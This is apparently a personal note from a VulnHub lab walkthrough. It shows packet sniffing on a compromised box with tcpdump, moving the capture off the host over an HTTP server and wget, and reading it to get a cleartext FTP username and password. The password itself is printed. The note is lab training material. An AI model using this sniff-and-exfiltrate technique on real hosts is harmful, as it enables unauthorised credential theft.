Capturing and sniffing through tcpdump...



this is how we can capture the packets via tcpdump tool.



    -w: Write all the data to a file called ftp.pcap
    -i: interface to listen on. To find which interface to use run tcpdump -D



cerberus@symfonos3:/home/cerberus$ tcpdump -D
1.enp0s3 [Up, Running]
2.any (Pseudo-device that captures on all interfaces) [Up, Running]
3.lo [Up, Running, Loopback]
4.nflog (Linux netfilter log (NFLOG) interface)
5.nfqueue (Linux netfilter queue (NFQUEUE) interface)
6.usbmon1 (USB bus number 1)
cerberus@symfonos3:/home/cerberus$ ls
linpeas.sh
cerberus@symfonos3:/home/cerberus$ tcpdump -w output.pcap -i lo
tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes


^C105 packets captured


after a while a terminated the capture..

transfer the output.pcap file to our local machine...

cerberus@symfonos3:/home/cerberus$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.56.1 - - [13/Apr/2021 13:22:20] "GET /output.pcap HTTP/1.1" 200 -
^C


-> # wget http://192.168.56.36:8000/output.pcap        
--2021-04-13 23:52:21--  http://192.168.56.36:8000/output.pcap
Connecting to 192.168.56.36:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11304 (11K) [application/vnd.tcpdump.pcap]
Saving to: ‘output.pcap’

output.pcap      100%[=======>]  11.04K  --.-KB/s    in 0s      

2021-04-13 23:52:21 (104 MB/s) - ‘output.pcap’ saved [11304/11304]




dumping capture...using tcpdum on our local host...


root@saims0n [23:52:41] [~/Desktop/Notes/Vulnhub_boxes/Tj-null/symfonous3] [main *]
-> # tcpdump -qns 0 -A -r output.pcap

[200~Host: 127.0.0.1
User-Agent: curl/7.52.1
Accept: */*

23:38:01.462607 IP 127.0.0.1.21 > 127.0.0.1.38544: tcp 55
E..k.+@.@.._............DUc........V._.....
.\...\..220 ProFTPD 1.3.5b Server (Debian) [::ffff:127.0.0.1]

23:38:01.462637 IP 127.0.0.1.38544 > 127.0.0.1.21: tcp 0
E..4k.@.@..-................DUc....V.(.....
.\...\..
23:38:01.462723 IP 127.0.0.1.38544 > 127.0.0.1.21: tcp 12
E..@k.@.@.. ................DUc....V.4.....
.\...\..USER hades

23:38:01.462728 IP 127.0.0.1.21 > 127.0.0.1.38544: tcp 0
E..4.,@.@...............DUc....%...V.(.....
.\...\..
23:38:01.463439 IP 127.0.0.1.21 > 127.0.0.1.38544: tcp 33
E..U.-@.@..s............DUc....%...V.I.....
.\...\..331 Password required for hades

23:38:01.463498 IP 127.0.0.1.38544 > 127.0.0.1.21: tcp 23
E..Kk.@.@..................%DUc....V.?.....
.\...\..PASS PTpZTfU4vxgzvRBE


found password ....


commands...to capture...


tcpdump -w output.pcap -i lo     //where lo is network interphase achived by tcpdump -D 

tcpdump -qns 0 -A -r output.pcap    
